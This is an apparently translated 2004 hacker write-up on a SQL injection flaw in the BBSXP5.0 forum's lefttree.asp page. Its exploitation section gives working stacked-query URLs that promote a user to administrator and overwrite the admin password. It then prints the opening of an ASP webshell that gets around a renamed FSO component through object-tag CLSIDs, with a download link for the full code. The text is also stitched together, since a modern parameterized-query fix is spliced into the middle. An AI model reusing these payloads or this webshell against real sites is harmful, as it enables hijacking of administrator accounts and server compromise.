===========================[ Shapeshifting with BBSXP5.0 ]==================
Discovered by: xiaolu(web@666w.cn) 13K(13_k@163.com) Affected versions: BBSXP5.0 SQL/ACCESS Date: 2004.5.1 WWW.666W.COM WWW.SHJSAFE.COM
==============[ 1. Preface ]============================================
-_-"" Today is May 1st, Labor Day, and I'm bored.. First of all, happy Labor Day everyone.....
Way too bored.. I was posting on a friend's forum and he asked me to check the forum's security..... Fine, had a look: it's BBSXP5.0. So I downloaded a copy to look at....
======================================[ 2. Content ]====================
Reading through the code..........
(I didn't expect such a **** problem; the programmers should do some soul-searching. There is no real technique in this article, I just want to remind programmers not to be so lazy :P)
lefttree.asp
<!-- #include file="setup.asp" -->
<%
if Request("menu")="menu" then
sql="Select * From menu where followid="&Request("id")&" order by SortNum"
Set Rs1=Conn.Execute(sql)
do while not rs1.eof
Hehe. See it? Request("id") is concatenated straight into the SQL string without any check at all (and Request() without a collection name will happily take the value from the query string, the form or a cookie). How lazy can you get.........
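For comparison, here is a hardened version of the same lefttree.asp fragment. This is an added example, not code from BBSXP; it assumes, like the original, that setup.asp supplies an open ADODB.Connection named Conn. The fix is twofold: reject any id that is not a plain integer, and pass the value to the database as a parameter instead of pasting it into the query text, so that stacked statements like the ones used later in this article never reach the SQL engine.

```vbscript
<!-- #include file="setup.asp" -->
<%
' Hardened variant of lefttree.asp (added example, not BBSXP's own code).
' Assumes setup.asp provides an open ADODB.Connection named Conn.
If Request("menu") = "menu" Then
    Dim rawId, followId
    ' Read explicitly from the query string; Request("id") alone would also
    ' accept the value from a form field or a cookie.
    rawId = Trim(Request.QueryString("id"))

    ' followid is an integer column, so accept only a short run of digits.
    ' IsNumeric alone is not enough: it also accepts "1e3", "1.5" and "&H1F".
    Dim re
    Set re = New RegExp
    re.Pattern = "^\d{1,9}$"
    If Not re.Test(rawId) Then
        Response.Status = "400 Bad Request"
        Response.Write "invalid id"
        Response.End
    End If
    followId = CLng(rawId)

    ' Even after validation, bind the value as a parameter so the query text
    ' itself never contains user-controlled characters.
    Dim cmd, rs1
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = Conn
    cmd.CommandType = 1      ' adCmdText
    cmd.CommandText = "SELECT * FROM menu WHERE followid = ? ORDER BY SortNum"
    ' CreateParameter(Name, Type, Direction, Size, Value): 3 = adInteger, 1 = adParamInput
    cmd.Parameters.Append cmd.CreateParameter("followid", 3, 1, , followId)
    Set rs1 = cmd.Execute

    Do While Not rs1.EOF
        ' Render the menu row exactly as the original loop does.
        Response.Write Server.HTMLEncode(rs1("SortNum") & "") & "<br>"
        rs1.MoveNext
    Loop
    rs1.Close
    Set rs1 = Nothing
    Set cmd = Nothing
End If
%>
```

The parameter binding is what actually closes the hole; the regex check is defence in depth and also gives a clean 400 instead of a database error page for garbage input. Server.HTMLEncode on output is unrelated to the injection but is the other habit this kind of code tends to be missing.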
=======================[ 3. Exploitation ]===================================
OK.Let's go.. http://www.host.com/LeftTree.asp?menu=menu&id=1;update [user] set membercode=5 where username='fuck';-- http://www.host.net/LeftTree.asp?menu=menu&id=1;update clubconfig set adminpassword='A64D84237507262182B4B902A5EDC35B';--
OK. user:fuck pass:xiaoxue
"A64D84237507262182B4B902A5EDC35B" is a 32-character MD5 hash.
Into the admin panel.. hehe. Let's get a webshell up.. Hmm, upload it.... Ah!!!!! FSO has been renamed.. sob sob
No fun anymore.. need to find a way around it.... OK. Got it!
Use an object tag, hahaha..... done, done........
Tried it: they didn't change the clsid. As long as the clsid is unchanged it still runs... the code is as follows:
<%@ LANGUAGE = VBScript.Encode codepage ="936" %>
<%Server.ScriptTimeOut=5000%>
<object runat=server id=oScript scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
<object runat=server id=oScriptNet scope=page classid="clsid:093FF999-1EA0-4079-9525-9614C3504B74"></object>
<object runat=server id=oFileSys scope=page classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></object>
<%
'on error resume next
httpt = Request.ServerVariables("server_name")
rseb=Request.ServerVariables("SCRIPT_NAME")
q=request("q")
if q="" then q=rseb
select case q
case rseb
if Epass(trim(request.form("password")))="fuckfuck" then
response.cookies("password")="7758521"
response.redirect rseb & "?q=list.asp"
else
%>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title><%=httpt%></title>
<meta name="GENERATOR" content="Microsoft FrontPage 3.0">
</head>
<body>
<%if request.form("password")<>"" then response.write "Password Error!" end if %>
<table border="1" width="100%" height="89" bgcolor="#DFDFFF" cellpadding="3" bordercolorlight="#000000" bordercolordark="#F2F2F9" cellspacing="0">
<tr>
<td width="100%" height="31" bgcolor="#000080"><p align="center"><font color="#FFFFFF"><%=httpt%></font></td>
</tr>
<tr>
<td width="100%" height="46"><form method="POST" action="<%=rseb%>?q=<%=rseb%>">
<div align="center"><center><p>Enter Password:<input type="password" name="password" size="20" style="border-left: thin none; border-right: thin none; border-top: thin outset; border-bottom: thin outset">
<input type="submit" value="OK!LOGIN" name="B1" style="font-size: 9pt; border: thin outset"></p>
</center></div>
</form>
</td>
</tr>
</table>
</body>
</html>
<%end if%>
Omitted......
Full code download: http://soft.666w.com/tools/gif.rar
Heh.... problem solved, and it can be taken further from here.......
=======================[ 4. Closing ]===================================
These can be used to gain higher privileges, hehe.. On the ACCESS version you can only get the MD5-hashed password, since the Jet engine does not execute a second stacked statement the way SQL Server does..